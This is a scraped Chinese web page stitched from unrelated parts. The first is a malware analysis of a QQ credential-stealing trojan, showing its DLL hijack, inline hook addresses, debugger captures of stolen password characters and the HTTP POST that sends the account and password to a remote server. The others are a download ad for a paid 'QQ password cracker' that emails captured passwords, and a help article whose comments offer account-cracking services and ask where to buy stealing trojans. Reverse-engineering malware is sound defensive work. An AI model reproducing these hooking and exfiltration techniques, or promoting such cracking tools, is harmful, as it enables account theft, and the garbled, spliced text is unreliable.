QQ盗号木马重创腾讯QQ密码安全机制
MD5：9913C5BACC0C7B98DF0D982B
文件: C:\Users\administrator\Desktop\9913c5bacc0c7b98df0d982b.exe
主要行为：破坏QQ自我保护机制，进行盗号
1.&标准的提权
用时间戳产生随机木马文件名
移动自身用于木马隐藏
启动线程开始干活了
用注册表找到QQ的保护程序
找到关键的QQ保护程序的路径
删除QQProtect/bin目录下的文件，破坏QQ的自我保护
释放rasman.dll劫持QQ的dll
把原来qq模块的rasman.dll，改名为rasmanOrg.dll
这个rasman.dll是盗号的主体，主要用于破坏qq保护机制和盗号。
这个是rasman.dll的函数转发，也就是dll劫持
结束qq的进程，然后等着qq重启。完成dll劫持
下面是核心的盗号功能实现，
sub_()是hookQQ登陆窗体焦点的函数，sub_钩子的实现函数，也就是把unk_这个地址hook成sub_
sub_ 功能是从内存中找到QQ账号和密码的明文，然后新建一个发送qq用户名和密码的线程发出去。
下面是关键的挂钩子的地方，
挂钩子的关键地点：
这两个钩子都挂在了LoginUI.dll上，主要用于劫持焦点和登陆消息的
完成挂钩功能的函数：
重新登陆qq,发现rasman.dll已经被盗号木马劫持，
此时，看一下木马下的钩子
这两个应该是QQ窗体的框的显示处理函数
还有一个对安全模块TSSafeEdit.dat的钩子。
关键看一下如何搞定安全模块的钩子吧。
len(10) QSLogic.dll&&&&&&&&& 0x-&0&[C:\WINDOWS\system32\WININET.dll]&&&&&&&&& inline&&&&&&&&& 8B FF 90 90 90 E9 9A 0D D9 64&&&&&&&&& 90 90 90 90 90 E9 90 90 90 90
len(10) QSLogic.dll&&&&&&&&& 0x-&0x7669EE02[C:\WINDOWS\system32\WININET.dll]&&&&&&&&& inline&&&&&&&&& 8B FF 90 90 90 E9 28 C7 D9 64&&&&&&&&& 90 90 90 90 90 E9 90 90 90 90
len(10) QSLogic.dll&&&&&&&&& 0x-&0x71A24C29[C:\WINDOWS\system32\WS2_32.dll]&&&&&&&&& inline&&&&&&&&& 8B FF 90 90 90 E9 3F 25 12 60&&&&&&&&& 90 90 90 90 90 E9 90 90 90 90
len(10) QSLogic.dll&&&&&&&&& 0x-&0x71A22F53[C:\WINDOWS\system32\WS2_32.dll]&&&&&&&&& inline&&&&&&&&& 8B FF 90 90 90 E9 59 08 12 60&&&&&&&&& 90 90 90 90 90 E9 90 90 90 90
[*]len(5) LoginUI.dll&&&&&&&&& 0x026270ED-&0x02C10000&&&&&&&&& inline&&&&&&&&& E9 0E 8F 5E 00&&&&&&&&& 88 45 F3 FF D6
[*]len(6) LoginLogic.dll&&&&&&&&& 0x02A2736A-&0x01D00000&&&&&&&&& inline&&&&&&&&& E9 91 8C 2D FF 90&&&&&&&&& 8B 46 04 FF 76 14
[*]len(5) LoginLogic.dll&&&&&&&&& 0x02A2CE0000&&&&&&&&& inline&&&&&&&&& E9 75 8C 2B FF&&&&&&&&& 55 8B EC 56 57
[*]len(6) TSSafeEdit.dat&&&&&&&&& 0x02B7A737-&0x02FF0000&&&&&&&&& inline&&&&&&&&& E9 C4 58 47 00 90&&&&&&&&& 55 8B EC 83 EC 0C
我们看一下钩子地方是干嘛的。。。然后钩子之后又是怎么处理的，一切就都明了了。
钩子的原始值：55 8B EC 83 EC 0C
这个应该是
mov ebp,esp
E9 C4 58 47 00 90 &这个几个十六进制对应的指令是基于指令本身地址偏移跳转的
0:010& u 02b7a737
TSSafeEdit+0xa737:
02b7a737 e9c4584700&&&&& jmp&&&& 02ff0000
02b7a73c 90 & & & & & & & & & &nop&
也就是跳到了02ff0000的地方。。。先看这个地方干了什么。。
0:010& u 02ff0000
02ff0000 60&&&&&&&&&&&&& pushad
02ff003&&&&& push&&& 3000000h
*** ERROR: Symbol file could not be found.& Defaulted to export symbols for C:\Program Files\Tencent\QQ\bin\rasman.dll -
02ffdfe&&&&& jmp&&&& rasman+0&60)
02ff000b 90&&&&&&&&&&&&& nop
02ff000c 90&&&&&&&&&&&&& nop
02ff000d 0000&&&&&&&&&&& add&&&& byte ptr [eax],al
02ff000f 0000&&&&&&&&&&& add&&&& byte ptr [eax],al
02ff&&&&&&&&&&& add&&&& byte ptr [eax],al
0:010& u 012c1860
rasman+0&1860:
012c42c&&&&&&& mov&&&& esi,dword ptr [esp+2Ch]
012cc2434&&&&&&& mov&&&& ebx,dword ptr [esp+34h]
012c&&&&&&&&&&& xor&&&& ecx,ecx
012c186a 8aca&&&&&&&&&&& mov&&&& cl,dl
012c186c 83fb01&&&&&&&&& cmp&&&& ebx,1
012c186f 751a&&&&&&&&&&& jne&&&& rasman+0x188b (012c188b)
012ccc000000&&& cmp&&&& ecx,0CCh
012cb&&&&&&&&&&& jne&&&& rasman+0&84)
直接到了012c1860这个地方，直接找到这个函数，地址转换过了。
AreFileApiIsANSI 检测一个I/O使用的是ANSI 还是&OEM 字符，这个是qq处理密码的关键函数，也是QQ密码传递到TSSafeEdit.dll的函数。木马也就是截取了加密的账号和密码，然后启动线程发出去了。也就盗号了
再看看TSSafeEdit这个保护模块的作用，QQ密码框接到输入消息之后交给TSSafeEdit去处理账号和密码字符，
再看TSSafeEdit，挂钩之前的函数，
0:010& u 02b7a737
TSSafeEdit+0xa737:
02b7a737 e9c4584700&&&&& jmp&&&& 02ff0000 & 这里被挂了钩子
02b7a73c 90&&&&&&&&&&&&& nop
02b7a73d 53&&&&&&&&&&&&& push&&& ebx&
02b7a73e 8bd9&&&&&&&&&&& mov&&&& ebx,ecx
02b7a740 56&&&&&&&&&&&&& push&&& esi
02b7a741 57&&&&&&&&&&&&& push&&& edi
02b7a742 895dfc&&&&&&&&& mov&&&& dword ptr [ebp-4],ebx
02b7a745 51&&&&&&&&&&&&& push&&& ecx
TSSafeEdit+0xa746:
02b7a746 e&&&&& call&&& TSSafeEdit+0xa74f (02b7a74f)
02b7a74b 0f88eb1059eb&&& js&&&&& ee10b83c
02b7a751 025033&&&&&&&&& add&&&& dl,byte ptr [eax+33h]
02b7a754 83c102&&&&&&&&& add&&&& ecx,2
02b7a757 eb02&&&&&&&&&&& jmp&&&& TSSafeEdit+0xa75b (02b7a75b)
02b7a759 7690&&&&&&&&&&& jbe&&&& TSSafeEdit+0xa6eb (02b7a6eb)
02b7a75b 51&&&&&&&&&&&&& push&&& ecx
02b7a75c c3&&&&&&&&&&&&& ret
函数很短，应该就是接到qq账号和密码，进行加密处理。。。就不深入搞了。。。。
木马作者hook了从密码框到安全TSSafeEdit.dll的过程函数，并夺取了焦点，此时qq还没进行加密处理。
在这里下个断点，应该能拿到qq账号和密码， 然后在这个地方下断点，敲入QQ密码的时候断点触发，在密码框每次敲入一个字符，就截获一次。
然后我们在密码框输入1，截获到密码：0&31 也就是ascii的&1&,在这个钩子的地方被劫持到了。一个值不足以证明，或许是巧合，
eax= ebx=77d568b8 ecx=00916c98 edx=7c92e4f4 esi= edi=
eip=012c1860 esp= ebp= iopl=0&&&&&&&& nv up ei pl nz ac pe nc
cs=001b& ss=0023& ds=0023& es=0023& fs=003b& gs=0000&&&&&&&&&&&& efl=
rasman+0&1860:
012c42c&&&&&&& mov&&&& esi,dword ptr [esp+2Ch] ss:0= & &1&
这里搞到了密码，
为了验证不是巧合，在密码框输入的abc
Breakpoint 0 hit
eax= ebx=77d568b8 ecx=00916c98 edx=7c92e4f4 esi= edi=
eip=012c1860 esp= ebp= iopl=0&&&&&&&& nv up ei pl nz ac pe nc
cs=001b& ss=0023& ds=0023& es=0023& fs=003b& gs=0000&&&&&&&&&&&& efl=
rasman+0&1860:
012c42c&&&&&&& mov&&&& esi,dword ptr [esp+2Ch] ss:0= &&a&
Breakpoint 0 hit
eax= ebx=77d568b8 ecx=00916c98 edx=7c92e4f4 esi= edi=
eip=012c1860 esp= ebp= iopl=0&&&&&&&& nv up ei pl nz ac pe nc
cs=001b& ss=0023& ds=0023& es=0023& fs=003b& gs=0000&&&&&&&&&&&& efl=
rasman+0&1860:
012c42c&&&&&&& mov&&&& esi,dword ptr [esp+2Ch] ss:0= &b&
Address expression missing from &&EOL&&
Breakpoint 0 hit
eax= ebx=77d568b8 ecx=00916c98 edx=7c92e4f4 esi= edi=
eip=012c1860 esp= ebp= iopl=0&&&&&&&& nv up ei pl nz ac pe nc
cs=001b& ss=0023& ds=0023& es=0023& fs=003b& gs=0000&&&&&&&&&&&& efl=
rasman+0&1860:
012c42c&&&&&&& mov&&&& esi,dword ptr [esp+2Ch] ss:0= &c&
密码已经截获，有代码有真相。
rasman是木马作者dll劫持之后注入的模块。
然后之前对LoginUI的hook就起作用了，对LoginUI的hook主要是获取qq登陆成功的消息，登陆成功之后，把刚才截获的密码发出去就行了。获取qq账号方法很多，篇幅所限，这里不做深入分析。
这是关键对QQ登陆窗体下钩子的地方，位于模块rasman.dll中
这里是劫持焦点，夺取密码的地方。
接受qq号和密码的地址
POST /qq/lin.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ***.186.130.187:81
Content-Length: 62
Cache-Control: no-cache
name=&pass=&ver=5.5.11447.0&mac=000C299FDCA2&id=0202
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 01 Sep :48 GMT
Content-Length: 2
要想进行调试，还要过一下qq的进程保护，要不没法挂调试器下断点，读内存。。。
保护的功能在QQProtect.exe这个进程中。主要防护线程是CreateThread+0x2e，具体机制不写了。暴力干掉这个线程过掉反调试。qq独立密码忘记了怎么办? - qq技术
您当前的位置→您所在的位置：&
& qq密码破解器.0 免费破解版
qq密码破解器.0 免费破解版
用于破解腾讯qq2015版本密码的软件
软件大小：769.3 KB
更新时间：
所属分类：
官方网站：
软件语言：简体中文
软件授权：免费软件
支持系统：Vista/winXP/win7/win8
同类人气软件
大小：56.46 MB　
继QQ2013之后最新版本基于Internet的即时通信软件
大小：7.76 MB　
石青qq陌生人推广大师：全自动QQ陌生人推广软件，支持推送推广信息到非QQ好友，高效稳定
大小：25.62 KB　
猫神局域网QQ查看器：帮你查询到同一网络下所有的QQ号码
大小：531.5 KB　
爆踩QQ名片制作：绿色免费的qq名片制作软件。
大小：2.08 MB　
qq分组：个性QQ分组参考工具。
本类下载排行
qq密码破解器2015破解版是一款用于破解qq2015版本密码的软件，全新智能的强力暴力电脑运行破解方法，可以快速破解qq密码，使用本产品不得用于做其他违法的行为，仅限本人使用，主要针对忘记自己qq密码用户推出的，本站提供qq密码破解器2015免费版下载。
qq密码破解器2015特色：
1.qq密码破解器是一款免费的qq2014破解神器，qq密码破解器2014暗夜版操作简单实用，是您找回qq密码最好的利器，是一款非常给力的qq密码破解软件，现在有很多人多的人长时间没上网，就把qq密码忘记了。作者针对这一普遍现象设计了qq密码破解器2015，它会针对电脑上遗忘的密码进行分析，从而帮你找回qq密码。
2.qq密码破解器2015支持qq2015、qq2014、qq2013、qq2012、qq2011、qq2010、qq2009,TM2009的密码记录既支持简体版，繁体版，国际版 无任何开机自启动项，电脑重启监控一样有效 软件仅用于管理自己的qq密码，密码遗忘qq密码丢失，进行找回的工具。
qq密码破解器2015功能：
1.采用先进的技术开发而成，无需后台进程即可监控qq。
2.完美支持qq2015、qq2014、qq2013、qq2012等各个版本的qq。
3.完美支持WIN7，WIN7下需要用管理员权限运行。
4.可将qq密码自动发送到您所指定的邮箱。
5.支持自定义启动密码，安全可靠。
6.要查看qq密码时，打开本软件即可。
7.购买一个注册码(78元)，可在3台电脑上不限时间、次数使用。
8.本qq密码破解器2015终身免费升级。
9.未注册用户不能把qq密码自动发送到您所指定的EMAIL，并且在软件中只显示qq密码的前三位。
10.在使用本软件过程中，遇到任何问题都可以与客服联系。
11.本qq密码破解器2015不含任何恶意代码，您完全可以放心使用。
精品专区推荐QQ新闻资讯
腾讯系列软件
腾讯手机业务
QQ空间和校友的应用以及网页游戏
QQ技巧,QQ教程
QQ表情,QQ头像,QQ空间素材
QQ空间日志,聊天宝典
测试,生肖,星座,搞笑
您的位置： ->
管理员 投递于
15:05:24 　　近日，在 Beta2优先体验版中，有网友在QQ面板安全沟通界面发现新的密码验证方式：。QQ服务独立密码是区别于QQ登陆密码的单独一套密码，在使用QQ的部分功能时进行二次身份验证的密码。目前适用于消息记录漫游等业务。下面大家一起来体验下这个惊人的发现吧！
设置QQ服务独立密码的方法：
　　Step 1、打开与某个QQ好友的聊天界面，点击消息记录→设置→消息记录同步设置；
　　Step 2、同意协议和安全指引→开通消息记录同步；
　　Step 3、设置QQ服务独立密码；
　　Step 4、完成QQ服务独立密码设置；
　　Step 5、成功开通消息记录同步，点击开始使用即可显示该好友7天内的消息记录。
　　到这里，QQ服务独立密码已经设置完成了，接下来，你可以删除或修改QQ服务独立密码。管理方法：QQ面板→安全沟通→密码安全→修改QQ服务独立密码。
　　进入QQ安全中心的管理独立密码页面（）后，即可对QQ服务独立密码进行重置或删除。
　　QQ服务独立密码与我们之前设置的QQ空间独立密码除了用途不一样之外，还有一个明显的不同：设置后可以删除。如图所示，点击删除后，即可通过验证原密码或密保删除QQ服务独立密码，这一点更具人性化。
　　同样，开通消息记录同步后也是可以取消的：打开与某好友的对话框→消息记录→消息记录同步设置→关闭消息记录同步→确定即可。
　　注：开通QQ服务独立密码需要QQ2011beta2或以上版本，目前该版本只允许参与本计划的用户登录，。
上一篇：下一篇：221.11.84.*
网络唯一先破解后付费。请注意冒充我们先付款的骗子楼上Q 3 专业Q 2 破解Q 7QQQ 5密码Q 6调取Q 0 聊天Q 4记录Q 3先破解Q 0 后付费
183.33.134.*
183.33.134.*
183.33.134.*
183.33.134.*
183.33.134.*
122.94.0.*
我的QQ号密码被我爸爸改掉了，我又忘了我的密保问题是什么？怎么帮，我想找个有诚信的人帮我盗回来，谢谢！跪求！！！
124.166.244.*
已经全忘了
中有专门盗号的木马软件可以下载（不过是要花钱的），从哪里下载的木马盗号软件就可以把QQ盗取。
122.243.108.*
218.8.63.*
我问一下、我的QQ号让人盗了
密保也让人改了
怎么下载木马盗号软件阿？
60.210.142.*
客服电话多少？
116.18.172.*
115.235.99.*
能不能教教或者帮帮忙？
58.42.193.*
我的资料全被洗了.什么都木有了
183.211.187.*
124.166.244.*
222.222.233.*
222.130.99.*
专业破解QQ密码
MSN 各种邮箱
需要联系QQ
113.225.145.*
专业盗Q加1 2
糊涂的睿智巍巍
您的举报已经提交成功，我们将尽快处理，谢谢！
在你登录QQ的那个面板那里下面有个找回密码点击那里按步骤走就可以了
大家还关注
(window.slotbydup=window.slotbydup || []).push({
id: '2081942',
container: s,
size: '1000,60',
display: 'inlay-fix'